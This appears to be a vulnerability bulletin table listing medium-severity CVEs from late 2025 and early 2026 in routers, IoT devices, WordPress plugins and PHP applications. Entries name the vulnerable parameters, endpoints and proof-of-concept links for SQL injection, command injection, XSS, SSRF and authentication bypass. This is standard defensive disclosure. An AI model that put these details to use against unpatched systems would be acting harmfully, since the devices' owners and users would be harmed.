| COMMAX Co., Ltd.--COMMAX Biometric Access Control System | COMMAX Biometric Access Control System 1.0.0 contains an unauthenticated reflected cross-site scripting vulnerability in cookie parameters 'CMX_ADMIN_NM' and 'CMX_COMPLEX_NM'. Attackers can inject malicious HTML and JavaScript code into these cookie values to execute arbitrary scripts in a victim's browser session. | 2025-12-31 | 6.1 | CVE-2021-47743 | Zero Science Lab Disclosure (ZSL-2021-5660) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database Entry Vendor Homepage VulnCheck Advisory: COMMAX Biometric Access Control System 1.0.0 Reflected XSS via Cookie Parameters |
| SOUND4 Ltd.--Impact/Pulse/First | SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain hardcoded credentials embedded in server binaries that cannot be modified through normal device operations. Attackers can leverage these static credentials to gain unauthorized access to the device across Linux and Windows distributions without requiring user interaction. | 2025-12-30 | 6.5 | CVE-2022-50696 | Zero Science Lab Disclosure (ZSL-2022-5729) Packet Storm Security Exploit Details IBM X-Force Vulnerability Exchange Entry SOUND4 Product Homepage VulnCheck Advisory: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Hardcoded Credentials Authentication Bypass |
| ETAP Lighting International NV--ETAP Safety Manager | ETAP Safety Manager 1.0.0.32 contains a cross-site scripting vulnerability in the 'action' GET parameter that allows unauthenticated attackers to inject malicious HTML and JavaScript. Attackers can craft specially formed requests to execute arbitrary scripts in victim browser sessions, potentially stealing credentials or performing unauthorized actions. | 2025-12-30 | 6.1 | CVE-2022-50802 | Zero Science Lab Disclosure (ZSL-2022-5711) Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database ETAP Vendor Homepage VulnCheck Advisory: ETAP Safety Manager 1.0.0.32 Unauthenticated Reflected Cross-Site Scripting via Action Parameter |
| JM-DATA ONU--JF511-TV | JM-DATA ONU JF511-TV version 1.0.67 is vulnerable to cross-site request forgery (CSRF) attacks, allowing attackers to perform administrative actions on behalf of authenticated users without their knowledge or consent. | 2025-12-30 | 6.5 | CVE-2022-50804 | Zero Science Lab Disclosure (ZSL-2022-5708) Packet Storm Security Exploit Entry CXSecurity Vulnerability Listing IBM X-Force Vulnerability Exchange Entry JM-DATA Vendor Homepage VulnCheck Advisory: JM-DATA ONU JF511-TV 1.0.67 Cross-Site Request Forgery (CSRF) Vulnerability |
| smackcoders--WP Import Ultimate CSV XML Importer for WordPress | The WP Import - Ultimate CSV XML Importer for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.35. This is due to inadequate validation of the resolved URL after following Bitly shortlink redirects in the `upload_function()` method. While the initial URL is validated using `wp_http_validate_url()`, when a Bitly shortlink is detected, the `unshorten_bitly_url()` function follows redirects to the final destination URL without re-validating it. This makes it possible for authenticated attackers with Contributor-level access or higher to make the server perform HTTP requests to arbitrary internal endpoints, including localhost, private IP ranges, and cloud metadata services (e.g., 169.254.169.254), potentially exposing sensitive internal data. | 2026-01-01 | 6.4 | CVE-2025-14627 | https://www.wordfence.com/threat-intel/vulnerabilities/id/87040f2b-4de0-4a8d-ae30-b340638a6df2?source=cve https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/uploadModules/UrlUpload.php#L73 https://plugins.trac.wordpress.org/browser/wp-ultimate-csv-importer/tags/7.34/uploadModules/UrlUpload.php#L290 https://plugins.trac.wordpress.org/changeset/3421699/wp-ultimate-csv-importer/trunk/uploadModules/UrlUpload.php |
| Rapid7--Velociraptor | Rapid7 Velociraptor versions before 0.75.6 contain a directory traversal issue on Linux servers that allows a rogue client to upload a file which is written outside the datastore directory. Velociraptor is normally only allowed to write in the datastore directory. The issue occurs due to insufficient sanitization of directory names which end with a ".", only encoding the final "." AS "%2E". Although files can be written to incorrect locations, the containing directory must end with "%2E". This limits the impact of this vulnerability, and prevents it from overwriting critical files. | 2025-12-29 | 6.8 | CVE-2025-14728 | https://docs.velociraptor.app/announcements/advisories/cve-2025-14728/ |
| Kings Information & Network Co.--KESS Enterprise | Exposure of Sensitive Information to an Unauthorized Actor, Missing Encryption of Sensitive Data, Files or Directories Accessible to External Parties vulnerability in Kings Information & Network Co. KESS Enterprise on Windows allows Privilege Escalation, Modify Existing Service, Modify Shared File.This issue affects KESS Enterprise: before *.25.9.19.exe | 2025-12-29 | 6.3 | CVE-2025-15065 | https://www.kings.co.kr/solution/01/KESS.jsp?O=10.64&B=Chrome |
| Innorix--Innorix WP | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Missing Authorization vulnerability in Innorix WP allows Path Traversal.This issue affects Innorix WP from All versions If the "exam" directory exists under the directory where the product is installed (ex: innorix/exam) | 2025-12-29 | 6.2 | CVE-2025-15066 | https://www.innorix.com/ https://www.gnit.co.kr/software/innorix_product.html |
| Petlibrio--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authentication bypass vulnerability that allows unauthenticated attackers to access any user account by exploiting OAuth token validation flaws in the social login system. Attackers can send requests to /member/auth/thirdLogin with arbitrary Google IDs and phoneBrand parameters to obtain full session tokens and account access without proper OAuth verification. | 2026-01-03 | 6.5 | CVE-2025-15115 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Authentication Bypass via API endpoint |
| D-Link--DWR-M920 | A weakness has been identified in D-Link DWR-M920 up to 1.1.50. The affected element is the function sub_4155B4 of the file /boafrm/formLtefotaUpgradeFibocom. This manipulation of the argument fota_url causes command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 6.3 | CVE-2025-15191 | VDB-338576 | D-Link DWR-M920 formLtefotaUpgradeFibocom sub_4155B4 command injection VDB-338576 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723554 | D-Link DWR-M920 V1.1.50 Command Injection https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeFibocom.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeFibocom.md#poc https://www.dlink.com/ |
| D-Link--DWR-M920 | A security vulnerability has been detected in D-Link DWR-M920 up to 1.1.50. The impacted element is the function sub_415328 of the file /boafrm/formLtefotaUpgradeQuectel. Such manipulation of the argument fota_url leads to command injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 6.3 | CVE-2025-15192 | VDB-338577 | D-Link DWR-M920 formLtefotaUpgradeQuectel sub_415328 command injection VDB-338577 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #723555 | D-Link DWR-M920 V1.1.50 Command Injection https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeQuectel.md https://github.com/panda666-888/vuls/blob/main/d-link/dwr-m920/formLtefotaUpgradeQuectel.md#poc https://www.dlink.com/ |
| code-projects--College Notes Uploading System | A security vulnerability has been detected in code-projects College Notes Uploading System 1.0. Impacted is an unknown function of the file /dashboard/userprofile.php. The manipulation of the argument image leads to unrestricted upload. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 6.3 | CVE-2025-15199 | VDB-338586 | code-projects College Notes Uploading System userprofile.php unrestricted upload VDB-338586 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724794 | Code-projects College Notes Uploading System v1.0 Arbitrary file upload vulnerability https://github.com/jjjjj-zr/jjjjjzr18/issues/1 https://code-projects.org/ |
| code-projects--Student File Management System | A vulnerability was identified in code-projects Student File Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /download.php. The manipulation of the argument istore_id leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. | 2025-12-29 | 6.3 | CVE-2025-15205 | VDB-338592 | code-projects Student File Management System download.php sql injection VDB-338592 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #724818 | Code-Projects Student File Management System V1.0 SQL Injection Vulnerability https://github.com/Bai-public/CVE/issues/4 https://code-projects.org/ |
| code-projects--Refugee Food Management System | A weakness has been identified in code-projects Refugee Food Management System 1.0. This affects an unknown part of the file /home/editfood.php. This manipulation of the argument a/b/c/d causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-29 | 6.3 | CVE-2025-15209 | VDB-338594 | code-projects Refugee Food Management System editfood.php sql injection VDB-338594 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722803 | code-projects Refugee Food Management System 1.0 SQL Injection Submit #724713 | Code-projects Refugee Food Management System v1.0 SQL injection (Duplicate) https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editfood.php.md https://code-projects.org/ |
| code-projects--Refugee Food Management System | A security vulnerability has been detected in code-projects Refugee Food Management System 1.0. This vulnerability affects unknown code of the file /home/editrefugee.php. Such manipulation of the argument a/b/c/sex/d/e/nationality_nid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-29 | 6.3 | CVE-2025-15210 | VDB-338595 | code-projects Refugee Food Management System editrefugee.php sql injection VDB-338595 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722804 | code-projects Refugee Food Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editrefugee.php.md https://code-projects.org/ |
| code-projects--Refugee Food Management System | A flaw has been found in code-projects Refugee Food Management System 1.0. Impacted is an unknown function of the file /home/refugee.php. Executing manipulation of the argument refNo/Fname/Lname/sex/age/contact/nationality_nid can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2025-12-30 | 6.3 | CVE-2025-15211 | VDB-338597 | code-projects Refugee Food Management System refugee.php sql injection VDB-338597 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722806 | code-projects Refugee Food Management System 1.0 SQL Injection https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_refugee.php.md https://code-projects.org/ |
| code-projects--Refugee Food Management System | A vulnerability was detected in code-projects Refugee Food Management System 1.0. This issue affects some unknown processing of the file /home/regfood.php. Performing manipulation of the argument a results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2025-12-30 | 6.3 | CVE-2025-15212 | VDB-338596 | code-projects Refugee Food Management System regfood.php sql injection VDB-338596 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #722807 | code-projects Refugee Food Management System 1.0 SQL Injection Submit #724712 | Code-projects Refugee Food Management System v1.0 SQL injection (Duplicate) https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_regfood.php.md https://code-projects.org/ |
| aizuda--snail-job | A vulnerability was determined in aizuda snail-job up to 1.7.0 on macOS. Affected by this vulnerability is the function FurySerializer.deserialize of the component API. This manipulation of the argument argsStr causes deserialization. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. | 2025-12-30 | 6.3 | CVE-2025-15246 | VDB-338636 | aizuda snail-job API FurySerializer.deserialize deserialization VDB-338636 | CTI Indicators (IOB, IOC, IOA) https://gitee.com/aizuda/snail-job/issues/ICQV61 |
| Tenda--W6-S | A vulnerability was found in Tenda W6-S 1.0.0.4(510). This affects the function TendaAte of the file /goform/ate of the component ATE Service. Performing manipulation results in os command injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-12-30 | 6.3 | CVE-2025-15254 | VDB-338644 | Tenda W6-S ATE Service ate TendaAte os command injection VDB-338644 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #725499 | Tenda W6-S V1.0.0.4(510) OS Command Injection https://github.com/dwBruijn/CVEs/blob/main/Tenda/ate.md https://www.tenda.com.cn/ |
| NetVision Information--ISOinsight | ISOinsight developed by NetVision Information has a Reflected Cross-site Scripting vulnerability, allowing unauthenticated remote attackers to execute arbitrary JavaScript codes in user's browser through phishing attacks. | 2025-12-30 | 6.1 | CVE-2025-15355 | https://www.twcert.org.tw/tw/cp-132-10609-0221b-1.html https://www.twcert.org.tw/en/cp-139-10610-b98b4-2.html |
| D-Link--DI-7400G+ | A vulnerability was found in D-Link DI-7400G+ 19.12.25A1. This affects an unknown function of the file /msp_info.htm?flag=cmd. The manipulation of the argument cmd results in command injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-12-30 | 6.3 | CVE-2025-15357 | VDB-338743 | D-Link DI-7400G+ msp_info.htm command injection VDB-338743 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #726376 | D-Link D-Link DI_7400G+ V19.12.25A1 Command Injection https://github.com/xyh4ck/iot_poc/tree/main/D-Link_DI_7400G%2B_Command_Injection https://www.dlink.com/ |
| n/a--EyouCMS | A security vulnerability has been detected in EyouCMS up to 1.7.7. Impacted is the function saveRemote of the file application/function.php. Such manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor is "[a]cknowledging the existence of the vulnerability, we have completed the fix and will release a new version, v1.7.8". | 2025-12-31 | 6.3 | CVE-2025-15373 | VDB-339081 | EyouCMS function.php saveRemote server-side request forgery VDB-339081 | CTI Indicators (IOB, IOC, IOA) Submit #718465 | Eyoucms 1.7.7 SSRF Vulnerability https://note-hxlab.wetolink.com/share/DeUFyoSjsPPK https://note-hxlab.wetolink.com/share/DeUFyoSjsPPK#-span--strong-proof-of-concept---strong---span- |
| n/a--EyouCMS | A flaw has been found in EyouCMS up to 1.7.7. The impacted element is the function unserialize of the file application/api/controller/Ajax.php of the component arcpagelist Handler. Executing manipulation of the argument attstr can lead to deserialization. The attack can be launched remotely. The exploit has been published and may be used. The vendor is "[a]cknowledging the existence of the vulnerability, we have completed the fix and will release a new version, v1.7.8". | 2025-12-31 | 6.3 | CVE-2025-15375 | VDB-339083 | EyouCMS arcpagelist Ajax.php unserialize deserialization VDB-339083 | CTI Indicators (IOB, IOC, IOA) Submit #718481 | EyouCMS 1.7.7 Deserialization https://note-hxlab.wetolink.com/share/2wLgcbKe9Toh https://note-hxlab.wetolink.com/share/2wLgcbKe9Toh#-span--strong-proof-of-concept---strong---span- |
| PHPGurukul--Small CRM | A security flaw has been discovered in PHPGurukul Small CRM 4.0. This impacts an unknown function of the file /admin/edit-user.php. The manipulation results in missing authorization. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-31 | 6.3 | CVE-2025-15390 | VDB-339151 | PHPGurukul Small CRM edit-user.php authorization VDB-339151 | CTI Indicators (IOB, IOC, IOA) Submit #727430 | PHPGurukul PHPGurukul Small Customer Relationship Management v4.0 Missing Authorization https://github.com/rsecroot/Small-Customer-Relationship-Management-CRM-in-PHP/blob/main/Broken%20Access%20Control.md https://phpgurukul.com/ |
| D-Link--DIR-806A | A weakness has been identified in D-Link DIR-806A 100CNb11. Affected is the function ssdpcgi_main of the component SSDP Request Handler. This manipulation causes command injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-31 | 6.3 | CVE-2025-15391 | VDB-339152 | D-Link DIR-806A SSDP Request ssdpcgi_main command injection VDB-339152 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #727637 | D-Link DIR-806A DIR806A1_FW100CNb11.bin Command Injection https://github.com/ccc-iotsec/cve-/blob/D-Link/D-Link%20DIR-806A%E6%9C%AA%E6%8E%88%E6%9D%83RCE.md https://www.dlink.com/ |
| Kohana--KodiCMS | A weakness has been identified in Kohana KodiCMS up to 13.82.135. This affects the function like of the file cms/modules/pages/classes/kodicms/model/page.php of the component Search API Endpoint. Executing manipulation of the argument keyword can lead to sql injection. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 6.3 | CVE-2025-15392 | VDB-339161 | Kohana KodiCMS Search API Endpoint page.php like sql injection VDB-339161 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718289 | KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 SQL Injection |
| Kohana--KodiCMS | A security vulnerability has been detected in Kohana KodiCMS up to 13.82.135. This impacts the function Save of the file cms/modules/kodicms/classes/kodicms/model/file.php of the component Layout API Endpoint. The manipulation of the argument content leads to code injection. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-31 | 6.3 | CVE-2025-15393 | VDB-339162 | Kohana KodiCMS Layout API Endpoint file.php save code injection VDB-339162 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #718290 | KodiCMS https://github.com/KodiCMS-Kohana/cms 13.82.135 Code Injection |
| campcodes--School File Management System | A security vulnerability has been detected in campcodes School File Management System 1.0. The affected element is an unknown function of the file /save_file.php. The manipulation of the argument File leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | 2026-01-01 | 6.3 | CVE-2025-15404 | VDB-339324 | campcodes School File Management System save_file.php unrestricted upload VDB-339324 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #728102 | campcodes School File Management System V1.0 Unrestricted Upload https://github.com/LaneyYu/cve/issues/7 https://www.campcodes.com/ |
| PHPGurukul--Online Course Registration | A flaw has been found in PHPGurukul Online Course Registration up to 3.1. This affects an unknown function. This manipulation causes missing authorization. Remote exploitation of the attack is possible. The exploit has been published and may be used. | 2026-01-01 | 6.3 | CVE-2025-15406 | VDB-339326 | PHPGurukul Online Course Registration authorization VDB-339326 | CTI Indicators (IOB, IOC) Submit #728354 | PHPGurukul Online Course Registration v3.1 Missing Authorization https://github.com/rsecroot/Online-Course-Registration/blob/main/Broken%20Access%20Control.md https://phpgurukul.com/ |
| EmpireSoft--EmpireCMS | A vulnerability has been found in EmpireSoft EmpireCMS up to 8.0. Impacted is the function CheckSaveTranFiletype of the file e/class/connect.php. Such manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 6.3 | CVE-2025-15423 | VDB-339345 | EmpireSoft EmpireCMS connect.php CheckSaveTranFiletype unrestricted upload VDB-339345 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #721346 | EmpireSoft EmpireCMS <= 8.0 Unrestricted Upload https://note-hxlab.wetolink.com/share/28QXRLje7Uz1 https://note-hxlab.wetolink.com/share/28QXRLje7Uz1#-span--strong-proof-of-concept---strong---span- |
| n/a--Daptin | A vulnerability was identified in Daptin 0.10.3. Affected by this vulnerability is the function goqu.L of the file server/resource/resource_aggregate.go of the component Aggregate API. The manipulation of the argument column/group/order leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-02 | 6.3 | CVE-2025-15439 | VDB-339384 | Daptin Aggregate API resource_aggregate.go goqu.L sql injection VDB-339384 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #719742 | Daptin https://github.com/daptin/daptin 0.10.3 SQL Injection https://note-hxlab.wetolink.com/share/yMZ8oEgMTAur https://note-hxlab.wetolink.com/share/yMZ8oEgMTAur#-span--strong-proof-of-concept---strong---span- |
| AA-Team--Pro Bulk Watermark Plugin for WordPress | Path Traversal: '.../...//' vulnerability in AA-Team Pro Bulk Watermark Plugin for WordPress allows Path Traversal.This issue affects Pro Bulk Watermark Plugin for WordPress: from n/a through 2.0. | 2025-12-31 | 6.5 | CVE-2025-28973 | https://vdp.patchstack.com/database/wordpress/theme/pro-watermark/vulnerability/wordpress-pro-bulk-watermark-plugin-for-wordpress-2-0-path-traversal-vulnerability?_s_id=cve |
| Petlibrio--Smart Pet Feeder Platform | Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains a broken access control vulnerability that allows authenticated users to access other users' pet data by exploiting missing ownership verification. Attackers can send requests to /member/pet/detailV2 with arbitrary pet IDs to retrieve sensitive information including pet details, member IDs, and avatar URLs without proper authorization checks. | 2026-01-03 | 6.5 | CVE-2025-3660 | Security Research: Petlibro: Your Pet Feeder Is Feeding Data To Anyone Who Asks VulnCheck Advisory: Petlibro Smart Pet Feeder Platform through 1.7.31 Broken Access Control via API endpoint |
| Audiomack--Audiomack | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Audiomack allows Stored XSS.This issue affects Audiomack: from n/a through 1.4.8. | 2025-12-31 | 6.5 | CVE-2025-49357 | https://vdp.patchstack.com/database/wordpress/plugin/audiomack/vulnerability/wordpress-audiomack-plugin-1-4-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Ruhul Amin--Content Fetcher | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ruhul Amin Content Fetcher allows DOM-Based XSS.This issue affects Content Fetcher: from n/a through 1.1. | 2025-12-31 | 6.5 | CVE-2025-49358 | https://vdp.patchstack.com/database/wordpress/plugin/content-fetcher/vulnerability/wordpress-content-fetcher-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Priority--Web | CWE-601 URL Redirection to Untrusted Site ('Open Redirect') | 2025-12-29 | 6.1 | CVE-2025-55060 | https://www.gov.il/en/departments/dynamiccollectors/cve_advisories_listing?skip=0 |
| Neilgee--Bootstrap Modals | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Neilgee Bootstrap Modals allows Stored XSS.This issue affects Bootstrap Modals: from n/a through 1.3.2. | 2025-12-31 | 6.5 | CVE-2025-62095 | https://vdp.patchstack.com/database/wordpress/plugin/bootstrap-modals/vulnerability/wordpress-bootstrap-modals-plugin-1-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WPFactory--Maximum Products per User for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPFactory Maximum Products per User for WooCommerce allows Stored XSS.This issue affects Maximum Products per User for WooCommerce: from n/a through 4.4.2. | 2025-12-31 | 6.5 | CVE-2025-62096 | https://vdp.patchstack.com/database/wordpress/plugin/maximum-products-per-user-for-woocommerce/vulnerability/wordpress-maximum-products-per-user-for-woocommerce-plugin-4-4-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SEOthemes--SEO Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SEOthemes SEO Slider allows DOM-Based XSS.This issue affects SEO Slider: from n/a through 1.1.1. | 2025-12-31 | 6.5 | CVE-2025-62097 | https://vdp.patchstack.com/database/wordpress/plugin/seo-slider/vulnerability/wordpress-seo-slider-plugin-1-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Webvitaly--Extra Shortcodes | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Webvitaly Extra Shortcodes allows Stored XSS.This issue affects Extra Shortcodes: from n/a through 2.2. | 2025-12-31 | 6.5 | CVE-2025-62111 | https://vdp.patchstack.com/database/wordpress/plugin/extra-shortcodes/vulnerability/wordpress-extra-shortcodes-plugin-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kcseopro--AdWords Conversion Tracking Code | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in kcseopro AdWords Conversion Tracking Code allows Stored XSS.This issue affects AdWords Conversion Tracking Code: from n/a through 1.0. | 2025-12-31 | 6.5 | CVE-2025-62118 | https://vdp.patchstack.com/database/wordpress/plugin/adwords-conversion-tracking-code/vulnerability/wordpress-adwords-conversion-tracking-code-plugin-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Anshul Gangrade--Custom Background Changer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Anshul Gangrade Custom Background Changer custom-background-changer allows Stored XSS.This issue affects Custom Background Changer: from n/a through 3.0. | 2025-12-31 | 6.5 | CVE-2025-62125 | https://vdp.patchstack.com/database/wordpress/plugin/custom-background-changer/vulnerability/wordpress-custom-background-changer-plugin-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| landwire--Responsive Block Control | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in landwire Responsive Block Control allows DOM-Based XSS.This issue affects Responsive Block Control: from n/a through 1.2.9. | 2025-12-31 | 6.5 | CVE-2025-62135 | https://vdp.patchstack.com/database/wordpress/plugin/responsive-block-control/vulnerability/wordpress-responsive-block-control-plugin-1-2-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThinkUpThemes--Melos | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThinkUpThemes Melos allows Stored XSS.This issue affects Melos: from n/a through 1.6.0. | 2025-12-31 | 6.5 | CVE-2025-62136 | https://vdp.patchstack.com/database/wordpress/theme/melos/vulnerability/wordpress-melos-theme-1-6-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Shuttlethemes--Shuttle | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shuttlethemes Shuttle allows Stored XSS.This issue affects Shuttle: from n/a through 1.5.0. | 2025-12-31 | 6.5 | CVE-2025-62137 | https://vdp.patchstack.com/database/wordpress/theme/shuttle/vulnerability/wordpress-shuttle-theme-1-5-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Maksym Marko--MX Time Zone Clocks | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Maksym Marko MX Time Zone Clocks allows Stored XSS.This issue affects MX Time Zone Clocks: from n/a through 5.1.1. | 2025-12-31 | 6.5 | CVE-2025-62146 | https://vdp.patchstack.com/database/wordpress/plugin/mx-time-zone-clocks/vulnerability/wordpress-mx-time-zone-clocks-plugin-5-1-1-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| Curator.io--Curator.io | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Curator.Io allows Stored XSS.This issue affects Curator.Io: from n/a through 1.9.5. | 2025-12-31 | 6.5 | CVE-2025-62742 | https://vdp.patchstack.com/database/wordpress/plugin/curatorio/vulnerability/wordpress-curator-io-plugin-1-9-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| zookatron--MyBookTable Bookstore | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in zookatron MyBookTable Bookstore allows Stored XSS.This issue affects MyBookTable Bookstore: from n/a through 3.5.5. | 2025-12-31 | 6.5 | CVE-2025-62743 | https://vdp.patchstack.com/database/wordpress/plugin/mybooktable/vulnerability/wordpress-mybooktable-bookstore-plugin-3-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Chris Steman--Page Title Splitter | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chris Steman Page Title Splitter allows Stored XSS.This issue affects Page Title Splitter: from n/a through 2.5.9. | 2025-12-31 | 6.5 | CVE-2025-62744 | https://vdp.patchstack.com/database/wordpress/plugin/page-title-splitter/vulnerability/wordpress-page-title-splitter-plugin-2-5-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CodeFlavors--Featured Video for WordPress & VideographyWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodeFlavors Featured Video for WordPress & VideographyWP allows Stored XSS.This issue affects Featured Video for WordPress & VideographyWP: from n/a through 1.0.18. | 2025-12-30 | 6.5 | CVE-2025-62746 | https://vdp.patchstack.com/database/wordpress/plugin/videographywp/vulnerability/wordpress-featured-video-for-wordpress-videographywp-plugin-1-0-18-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Genetech Products--Web and WooCommerce Addons for WPBakery Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Genetech Products Web and WooCommerce Addons for WPBakery Builder allows DOM-Based XSS.This issue affects Web and WooCommerce Addons for WPBakery Builder: from n/a through 1.5. | 2025-12-31 | 6.5 | CVE-2025-62748 | https://vdp.patchstack.com/database/wordpress/plugin/vc-addons-by-bit14/vulnerability/wordpress-web-and-woocommerce-addons-for-wpbakery-builder-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bainternet--User Specific Content | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Bainternet User Specific Content allows DOM-Based XSS.This issue affects User Specific Content: from n/a through 1.0.6. | 2025-12-31 | 6.5 | CVE-2025-62749 | https://vdp.patchstack.com/database/wordpress/plugin/user-specific-content/vulnerability/wordpress-user-specific-content-plugin-1-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kalender.digital--Calendar.online / Kalender.digital | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in kalender.Digital Calendar.Online / Kalender.Digital allows DOM-Based XSS.This issue affects Calendar.Online / Kalender.Digital: from n/a through 1.0.11. | 2025-12-31 | 6.5 | CVE-2025-62752 | https://vdp.patchstack.com/database/wordpress/plugin/kalender-digital/vulnerability/wordpress-calendar-online-kalender-digital-plugin-1-0-11-cross-site-scripting-xss-vulnerability?_s_id=cve |
| lvaudore--The Moneytizer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in lvaudore The Moneytizer allows DOM-Based XSS.This issue affects The Moneytizer: from n/a through 10.0.6. | 2025-12-31 | 6.5 | CVE-2025-62756 | https://vdp.patchstack.com/database/wordpress/plugin/the-moneytizer/vulnerability/wordpress-the-moneytizer-plugin-10-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WebMan Design | Oliver Juhas--WebMan Amplifier | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebMan Design | Oliver Juhas WebMan Amplifier allows DOM-Based XSS.This issue affects WebMan Amplifier: from n/a through 1.5.12. | 2025-12-31 | 6.5 | CVE-2025-62757 | https://vdp.patchstack.com/database/wordpress/plugin/webman-amplifier/vulnerability/wordpress-webman-amplifier-plugin-1-5-12-cross-site-scripting-xss-vulnerability?_s_id=cve |
